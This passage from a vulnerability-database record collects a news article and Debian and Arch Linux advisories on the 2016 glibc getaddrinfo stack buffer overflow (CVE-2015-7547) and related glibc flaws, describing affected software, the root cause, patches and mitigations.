payloads of malicious code) data flowing between a vulnerable device and the Internet.\n\n \n\n\n### Affected Software and Devices\n\n \n\n\nAll versions of glibc after 2.9 are vulnerable. 
Therefore, any software or application that connects to things on a network or the Internet and uses glibc is at RISK.\n\n \n\n\nThe widely used SSH, sudo, and curl utilities are all known to be affected by the buffer overflow bug, and security researchers warn that the list of other affected applications or code is almost too diverse and numerous to enumerate completely.\n\n \n\n\nThe vulnerability could extend to a nearly all the major software, including:\n\n * Virtually all distributions of Linux.\n * Programming languages such as the Python, PHP, and Ruby on Rails.\n * Many others that use Linux code to lookup the numerical IP address of an Internet domain.\n * Most Bitcoin software is [reportedly vulnerable](<https://thehackernews.com/2015/01/ghost-linux-security-vulnerability27.html>), too.\n\n \n\n\n### Who are Not Affected\n\n \n\n\nThe good news is users of Google's Android mobile operating system aren't vulnerable to this flaw. As the company uses a glibc substitute known as Bionic that is not susceptible, according to a Google representative.\n\n \n\n\nAdditionally, a lot of embedded Linux devices, including home routers and various gadgets, are not affected by the bug because these devices use the **uclibc** library as it is more lightweight than hefty glibc.\n\n \n\n\nThe vulnerability was first introduced in May 2008 but was [reported](<https://sourceware.org/bugzilla/show_bug.cgi?id=18665>) to the glibc maintainers July 2015.\n\n \n\n\nThe vulnerability was discovered independently by researchers at **Google** and **Red Hat**, who found that the vulnerability has likely not been publicly attacked.\n\n \n\n\nThe flaw was discovered when one of the Google's SSH apps experienced a severe error called a segmentation fault each time it attempted to contact to a particular Internet address, Google's security team reported in a [blog post](<https://googleonlinesecurity.blogspot.ca/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html>) published Monday.\n\n 
\n\n\n### Where glibc went Wrong\n\n \n\n\nGoogle researchers figured out that the error was due to a buffer overflow bug inside the glibc library that made malicious code execution attacks possible. The researchers then notified glibc maintainers.\n\n \n\n\nHere's what went wrong, according to the Google engineers:\n\n \n\n\n> \"glibc reserves 2048 bytes in the stack through alloca() for the DNS answer at _nss_dns_gethostbyname4_r() for hosting responses to a DNS query. Later on, at send_dg() and send_vc(), if the response is larger than 2048 bytes, a new buffer is allocated from the heap and all the information (buffer pointer, new buffer size and response size) is updated.\" \n \n\"Under certain conditions a mismatch between the stack buffer and the new heap allocation will happen. The final effect is that the stack buffer will be used to store the DNS response, even though the response is larger than the stack buffer and a heap buffer was allocated. This behavior leads to the stack buffer overflow.\"\n\n \n\n\n#### _Proof-of-Concept Exploit Released_\n\nGoogle bod Fermin J. Serna released a [Proof-of-Concept](<https://github.com/fjserna/CVE-2015-7547>) (POC) exploit code on Tuesday.\n\n \n\n\nWith this POC code, you can verify if you are affected by this critical issue, and verify any mitigations you may wish to enact.\n\n \n\n\n### Patch glibc Vulnerability\n\n \n\n\nGoogle researchers, working with security researchers at Red Hat, have [released a patch](<https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html>) to fix the programming blunder.\n\n \n\n\nHowever, it is now up to the community behind the Linux OS and manufacturers, to roll out the patch to their affected software and devices as soon as possible.\n\n \n\n\nFor people running servers, fixing the issue will be a simple process of downloading and installing the patch update.\n\n \n\n\nBut for other users, patching the problem may **not be so easy**. 
The apps compiled with a vulnerable glibc version should be recompiled with an updated version \u2013 a process that will take time as users of affected apps have to wait for updates to become available from developers.\n\n \n\n\nMeanwhile, you can help prevent exploitation of the flaw, if you aren\u2019t able to immediately patch your instance of glibc, by limiting all TCP DNS replies to 1024 bytes, and dropping UDP DNS packets larger than 512 bytes.\n\n \n\n\nFor more in-depth information on the glibc flaw, you can read Red Hat [blog post](<https://access.redhat.com/errata/RHSA-2016:0175>).\n", "modified": "2016-02-17T08:27:51", "published": "2016-02-16T21:27:00", "id": "THN:ACBFC80659E47A5B7C81B99570749679", "href": "https://thehackernews.com/2016/02/glibc-linux-flaw.html", "type": "thn", "title": "Critical glibc Flaw Puts Linux Machines and Apps at Risk (Patch Immediately)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2020-11-11T13:28:00", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9761", "CVE-2015-7547"], "description": "Package : eglibc\nVersion : 2.11.3-4+deb6u11\nCVE ID : CVE-2015-7547\n\nSeveral vulnerabilities have been fixed in the Debian GNU C Library,\neglibc:\n\nCVE-2015-7547\n The Google Security Team and Red Hat discovered that the glibc\n host name resolver function, getaddrinfo, when processing\n AF_UNSPEC queries (for dual A/AAAA lookups), could mismange its\n internal buffers, leading to a stack-based buffer overflow and\n arbitrary code execution. 
This vulnerability affects most\n applications which perform host name resolution using getaddrinfo,\n including system services.\n\nThe following fixed vulnerabilities currently lack CVE assignment:\n\n Andreas Schwab reported a memory leak (memory allocation without a\n matching deallocation) while processing certain DNS answers in\n getaddrinfo, related to the _nss_dns_gethostbyname4_r function.\n This vulnerability could lead to a denial of service.\n\nFor Debian 6 "Squeeze", these issues have been fixed in eglibc version\neglibc_2.11.3-4+deb6u11. In addition this version corrects the fix for\nCVE-2014-9761 in Squeeze, which have wrongly marked a few symbols as\npublic instead of private.\n\nWhile it is only necessary to ensure that all processes are not using\nthe old eglibc anymore, it is recommended to reboot the machines after\napplying the security upgrade.\n\nWe recommend you to upgrade your eglibc packages.\n", "edition": 9, "modified": "2016-02-16T16:49:39", "published": "2016-02-16T16:49:39", "id": "DEBIAN:DLA-416-1:26BFF", "href": "https://lists.debian.org/debian-lts-announce/2016/debian-lts-announce-201602/msg00009.html", "title": "[SECURITY] [DLA 416-1] eglibc security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-12T00:58:15", "bulletinFamily": "unix", "cvelist": ["CVE-2015-8776", "CVE-2015-8779", "CVE-2015-8778", "CVE-2015-7547"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3481-1 security@debian.org\nhttps://www.debian.org/security/ Florian Weimer\nFebruary 16, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : glibc\nCVE ID : CVE-2015-7547 CVE-2015-8776 CVE-2015-8778 CVE-2015-8779\nDebian Bug : 812441 812445 812455\n\nSeveral vulnerabilities have been fixed in the GNU C Library, glibc. 
\n\nThe first vulnerability listed below is considered to have critical\nimpact.\n\nCVE-2015-7547\n\n The Google Security Team and Red Hat discovered that the glibc\n host name resolver function, getaddrinfo, when processing\n AF_UNSPEC queries (for dual A/AAAA lookups), could mismanage its\n internal buffers, leading to a stack-based buffer overflow and\n arbitrary code execution. This vulnerability affects most\n applications which perform host name resolution using getaddrinfo,\n including system services.\n\nCVE-2015-8776\n\n Adam Nielsen discovered that if an invalid separated time value\n is passed to strftime, the strftime function could crash or leak\n information. Applications normally pass only valid time\n information to strftime; no affected applications are known.\n\nCVE-2015-8778\n\n Szabolcs Nagy reported that the rarely-used hcreate and hcreate_r\n functions did not check the size argument properly, leading to a\n crash (denial of service) for certain arguments. No impacted\n applications are known at this time.\n\nCVE-2015-8779\n\n The catopen function contains several unbound stack allocations\n (stack overflows), causing it the crash the process (denial of\n service). 
No applications where this issue has a security impact\n are currently known.\n\nWhile it is only necessary to ensure that all processes are not using\nthe old glibc anymore, it is recommended to reboot the machines after\napplying the security upgrade.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 2.19-18+deb8u3.\n\nFor the unstable distribution (sid), these problems will be fixed in\nversion 2.21-8.\n\nWe recommend that you upgrade your glibc packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 11, "modified": "2016-02-16T14:18:54", "published": "2016-02-16T14:18:54", "id": "DEBIAN:DSA-3481-1:79F3C", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2016/msg00051.html", "title": "[SECURITY] [DSA 3481-1] glibc security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:36", "bulletinFamily": "unix", "cvelist": ["CVE-2015-8776", "CVE-2015-8777", "CVE-2015-8779", "CVE-2015-8778", "CVE-2015-7547"], "description": "- CVE-2015-7547 (arbitrary code execution)\n\nA stack-based buffer overflow was found in the way the libresolv library\nperformed dual A/AAAA DNS queries. A remote attacker could create a\nspecially crafted DNS response which could cause libresolv to crash or,\npotentially, execute code with the permissions of the user running the\nlibrary. 
Note: this issue is only exposed when libresolv is called from\nthe nss_dns NSS service module.\n\n- CVE-2015-8776 (information disclosure)\n\nIt was found that out-of-range time values passed to the strftime\nfunction may cause it to crash, leading to a denial of service, or\npotentially disclosure information.\n\n- CVE-2015-8777 (restriction bypass)\n\nLD_POINTER_GUARD was an environment variable which controls\nsecurity-related behavior, but was not ignored for privileged binaries\n(in AT_SECURE mode). This might allow local attackers (who can supply\nthe environment variable) to bypass intended security restrictions.\n\n- CVE-2015-8778 (arbitrary code execution)\n\nAn integer overflow in hcreate and hcreate_r which can result in\nan out-of-bound memory access. This could lead to application crashes\nor, potentially, arbitrary code execution.\n\n- CVE-2015-8779 (arbitrary code execution)\n\nA stack overflow (unbounded alloca) in the catopen function can cause\napplications which pass long strings to the catopen function to crash\nor, potentially execute arbitrary code.", "modified": "2016-02-17T00:00:00", "published": "2016-02-17T00:00:00", "id": "ASA-201602-14", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-February/000554.html", "type": "archlinux", "title": "glibc: multiple issues", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}